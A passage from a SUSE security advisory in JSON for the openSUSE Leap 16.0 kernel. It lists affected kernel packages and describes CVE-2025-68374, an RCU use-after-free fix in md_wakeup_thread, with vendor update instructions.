"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68372"
},
{
"cve": "CVE-2025-68374",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68374"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: fix rcu protection in md_wakeup_thread\n\nWe attempted to use RCU to protect the pointer \u0027thread\u0027, but directly\npassed the value when calling md_wakeup_thread(). This means that the\nRCU pointer has been acquired before rcu_read_lock(), which renders\nrcu_read_lock() ineffective and could lead to a use-after-free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68374",
"url": "https://www.suse.com/security/cve/CVE-2025-68374"
},
{
"category": "external",
"summary": "SUSE Bug 1255530 for CVE-2025-68374",
"url": "https://bugzilla.suse.com/1255530"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
